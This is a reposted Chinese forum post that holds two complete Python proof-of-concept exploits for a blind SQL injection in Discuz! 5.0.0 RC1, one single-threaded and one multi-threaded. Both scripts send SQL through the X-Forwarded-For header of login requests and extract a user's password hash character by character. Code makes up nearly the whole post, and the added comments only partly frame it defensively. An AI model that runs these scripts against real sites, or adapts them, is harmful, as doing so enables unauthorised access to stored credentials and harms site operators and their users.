
[转载]Discuz! 5.0.0 RC1 SQL injection PoC (python版)

[转载]Discuz! 5.0.0 RC1 SQL injection PoC (python版)

原创作者:wofeiwo

#wofeiwo原创,pt007给程序做了一下注释,以方便其它人的学习:
#!c:\python24\pyton
# Discuz! 5.0.0 RC1 SQL injection PoC
# Author: wofeiwo thx superheis help
# Date: Aug 12th 2006

import sys
import httplib
from urlparse import urlparse
from time import sleep

def injection(lenthofpass,realurl,path):
   """Character-by-character blind (boolean-based) SQL injection probe.

   Demonstrates the Discuz! 5.0.0 RC1 issue named in the file header: an
   SQL fragment is placed in the ``X-Forwarded-For`` header of a login
   POST and the response body is used as the true/false oracle.  The
   defender's take-away is the classic one: a client-controlled header
   must never reach a query without parameterisation or validation, and
   a probe of this shape is visible in access logs as a burst of
   near-identical POSTs to ``logging.php`` whose ``X-Forwarded-For``
   value is not an IP address.

   Args:
      lenthofpass: number of hash positions to probe (the caller passes 32).
      realurl: ``urlparse`` result for the target; only ``realurl[1]``
         (the network location) is read here.
      path: URL path prefix that ``logging.php`` is appended to.

   Also reads ``sys.argv[2]`` (the uid) directly instead of taking it as
   a parameter.  Calls ``sys.exit(1)`` when ``'SELECT'`` is found at
   index 1 of a response body.  Returns ``None``; progress is written to
   ``sys.stdout``.
   """
   sys.stdout.write('[+]The uid='+sys.argv[2]+' password hash is: \n')
   for num in range(1,lenthofpass+1): # positions 1..lenthofpass of the 32-char MD5 hash
      ran=range(97, 123) # ASCII codes for 'a'-'z'
      #for a1 in range(65,91): # ASCII codes for 'A'-'Z' (disabled)
        #  ran.append(a1)
      for a in range(48, 58): # ASCII codes for '0'-'9'
        ran.append(a) # extend the candidate list with the digits
      
      for i in ran: # try every lowercase letter and digit for this position

        # SQL fragment sent to the server; its truth value depends on whether the
        # character at position num of the stored hash equals chr(i)
        query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'
        # request headers as a dict; the payload rides in X-Forwarded-For
        header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
        # fixed login form body; the credentials in it are not what is being tested
        data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
        #print header
        #sys.exit(1)
        http = httplib.HTTPConnection(realurl[1]) # e.g. httplib.HTTPConnection('www.cwi.nl')
        http.request("POST", path + "logging.php?action=login&",data , header) # send the POST request
        #sleep(1)
        response = http.getresponse() # server's response object
        re1 = response.read() # whole response body as a string
        #print "response body:"
        #print re1
        if re1.find('SELECT') ==1: # str.find returns the match index, or -1 when absent
           print '[-] Unvalnerable host' # treated as not vulnerable
           print '[-] Exit..'
           sys.exit(1);

        elif re1.find('ip3') == -1:# 'ip3' absent from the body: this candidate is taken as a hit
           sys.stdout.write(chr(i)) # echo the matched character
           #print chr(i)
           http.close()
           #sleep(1)
           #break
           
           #print re1
           #print '-----------------------------------------------'
           http.close() # second close of the same connection (harmless)
           #sleep(1)
           sys.stdout.write('\n') # newline after each hit

def main ():
   """Command-line entry point of the single-threaded PoC.

   Expects ``sys.argv == [prog, url, uid]``; otherwise prints usage and
   exits with status 0.  Builds the request path from the parsed URL and
   hands everything to ``injection`` with a fixed hash length of 32.
   (The body of this function was flattened to column 0 by the forum
   paste; it is re-indented here without changing any statement.)
   """
   print 'Discuz! 5.0.0 RC1 SQL injection exploit'
   print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

   if len(sys.argv) == 3:
      url = urlparse(sys.argv[1])
      if url[2:-1] != '/': # slice of the parsed-URL tuple from the third item to the second-to-last
         u = url[2] + '/'
      else:
         u = url[2] # u is the path component, e.g. /dz/
   else:
      print "Usage: %s <url> <uid>" % sys.argv[0]
      print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
      sys.exit(0)

   lenth = 32 # number of hash characters to recover (MD5 hex digest length)
   print &#39;[+] Connect %s&#39; % url[1]
   print &#39;[+] Trying...&#39;
   print &#39;[+] Plz wait a long long time...&#39;

   injection(lenth, url, u)

   print &#39;[+] Finished&#39;

# Script entry point.
if __name__ == &#39;__main__&#39;: main()
每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!


呵呵,练手的程序.让人见笑了
我再发个多线程版本的python程序.也是练手用,算法和多线程同步都没做好.
真正效率高的,还是要看c语言版本算法精良的.
#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
# Author: wofeiwo
# Bug find by Defence80 ([url]http://www.defence80.com[/url])
# Date: Aug 13th 2006

import sys
import httplib
import threading
from urlparse import urlparse
from time import sleep

# Shared result table: hash position (1..32) -> recovered character.
# Written by the worker threads in injection(), read by main() once all
# threads have finished; no lock is used because each thread writes only
# its own key.
password = {1:&#39;&#39;,2:&#39;&#39;,3:&#39;&#39;,4:&#39;&#39;,5:&#39;&#39;,6:&#39;&#39;,7:&#39;&#39;,8:&#39;&#39;,9:&#39;&#39;,10:&#39;&#39;,11:&#39;&#39;,12:&#39;&#39;,13:&#39;&#39;,14:&#39;&#39;,15:&#39;&#39;,16:&#39;&#39;,17:&#39;&#39;,18:&#39;&#39;,19:&#39;&#39;,20:&#39;&#39;,21:&#39;&#39;,22:&#39;&#39;,23:&#39;&#39;,24:&#39;&#39;,25:&#39;&#39;,26:&#39;&#39;,27:&#39;&#39;,28:&#39;&#39;,29:&#39;&#39;,30:&#39;&#39;,31:&#39;&#39;,32:&#39;&#39;}

class creatthread (threading.Thread):
   """Worker thread that probes one hash position.

   The thread name (a string) doubles as the hash position it is
   responsible for; ``run`` forwards it to the module-level ``injection``
   function, which is defined below this class.
   """
   def __init__ (self, threadname, url, u):
      """Store the target and register the thread under ``threadname``.

      Args:
         threadname: position index as a string, e.g. ``'7'``.
         url: ``urlparse`` result for the target.
         u: URL path prefix that ``logging.php`` is appended to.
      """
      self.realurl = url
      self.realu = u
      threading.Thread.__init__(self, name = threadname)
      
   def run (self):
      """Probe the position named by this thread; hash length is fixed at 32."""
      lenth = 32
      injection(lenth, self.realurl, self.realu, self.getName())      
   
def  injection (lenthofpass, realurl, path, num):
      """Probe a single hash position with a blind (boolean-based) SQL injection.

      Multi-threaded variant of the single-threaded PoC above: each worker
      handles one position ``num`` and stores the matched character in the
      module-level ``password`` dict.  The payload again travels in the
      ``X-Forwarded-For`` header of a login POST; from a defender's view
      the same mitigations apply (never interpolate a client-supplied
      header into SQL, validate it as an IP address) and the same log
      signature appears, here as 32 concurrent bursts.

      Args:
         lenthofpass: accepted for symmetry with the caller but not used here.
         realurl: ``urlparse`` result; only ``realurl[1]`` (network location) is read.
         path: URL path prefix that ``logging.php`` is appended to.
         num: hash position as a string (the thread name); used both in
            the query text and, via ``int(num)``, as the ``password`` key.

      Reads ``sys.argv[2]`` (the uid) directly.  Calls ``sys.exit(1)`` when
      ``'SELECT'`` is absent from a response body; raised inside a worker
      thread, that SystemExit ends only this thread.  Returns ``None``.
      """
      
      ran = range(97, 123) # ASCII codes for 'a'-'z'
      for a in range(48, 58): ran.append(a) # add the digits '0'-'9'

      for i in ran: # try each lowercase letter and digit for this position
   
        # SQL fragment whose truth value depends on whether the character at
        # position num of the stored hash equals chr(i)
        query = &#39;\&#39; union select 122,122,122,122,122,122,122,122 from cdb_members where uid=&#39; + sys.argv[2] + &#39; AND ascii(substring(CONCAT(password),&#39; + num + &#39;,1))=&#39; + str(i) + &#39; /*&#39;
        # request headers; the payload rides in X-Forwarded-For
        header = {&#39;Accept&#39;:&#39;image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*&#39;,&#39;Referer&#39;:&#39;http://&#39; + realurl[1] + path + &#39;logging.php?action=login&#39;,&#39;Accept-Language&#39;:&#39;zh-cn&#39;,&#39;Content-Type&#39;:&#39;application/x-www-form-urlencoded&#39;,&#39;User-Agent&#39;:&#39;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)&#39;,&#39;Connection&#39;:&#39;Keep-Alive&#39;,&#39;Cache-Control&#39;:&#39;no-cache&#39;,&#39;X-Forwarded-For&#39;:query,&#39;Cookie&#39;:&#39;cdb_sid=70KRjS; cdb_cookietime=2592000&#39;}
        # fixed login form body; the credentials in it are not what is being tested
        data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
        #print header
        #sys.exit(1)
        http = httplib.HTTPConnection(realurl[1])
        http.request("POST", path + "logging.php?action=login&",data , header) # send the POST request
        sleep(1) # pause between request and read
        response = http.getresponse()
        re1 = response.read() # whole response body
        if re1.find(&#39;SELECT&#39;) == -1: # 'SELECT' absent: treated as not vulnerable
           print &#39;[-] Unvalnerable host&#39;
           print &#39;[-] Exit..&#39;
           sys.exit(1);
   
        elif re1.find(&#39;ip3&#39;) == -1: # 'ip3' absent: this candidate is taken as the hit
           password[int(num)] = chr(i) # record the character for this position
           #print &#39;[+] password &#39; + num + &#39;: &#39; + chr(i)
           http.close()
           sleep(1)
           break # position resolved; stop trying further candidates
        #print re1
        #print &#39;-----------------------------------------------&#39;
        http.close()
        sleep(1) # throttle the next candidate's request

def main ():
   """Command-line entry point of the multi-threaded PoC.

   Expects ``sys.argv == [prog, url, uid]``; otherwise prints usage and
   exits with status 0.  Starts one ``creatthread`` per hash position
   (1..32), busy-waits until only the main thread is left, then prints the
   characters collected in the module-level ``password`` dict in order.
   """
   print &#39;Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)&#39;
   print &#39;Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n&#39;

   if len(sys.argv) == 3:
      url = urlparse(sys.argv[1])
      if url[2:-1] != &#39;/&#39;: # slice of the parsed-URL tuple from the third item to the second-to-last
        u = url[2] + &#39;/&#39;
      else:
        u = url[2] # u is the path component, e.g. /dz/
   else:
      print "Usage: %s <url> <uid>" % sys.argv[0]
      print "Example: %s [url]http://127.0.0.1/dz/[/url] 1" % sys.argv[0]
      sys.exit(0)

   print &#39;[+] Connect %s&#39; % url[1]
   print &#39;[+] Begin threads...&#39;
   print &#39;[+] Plz wait a long long time...&#39;
   
   for a in range(1,33) : # one worker per hash position; the thread name carries the position
      thread = creatthread(str(a), url, u)
      thread.start()
   
   # Busy-wait (no join) until every worker has exited; the while/else body
   # runs once the loop condition becomes false.
   while threading.activeCount() != 1:
      continue
   else:
      sys.stdout.write( &#39;[+] The uid=&#39; + sys.argv[2] + &#39; password hash is: &#39; )
      for n in range(1, 33) : # emit the collected characters in position order
        sys.stdout.write(password[n])
      sys.stdout.write(&#39;\n[+] Finished \n&#39;)
      

# Script entry point.
if __name__ == &#39;__main__&#39;: main()
http://www.phpweblog.net/GaRY/
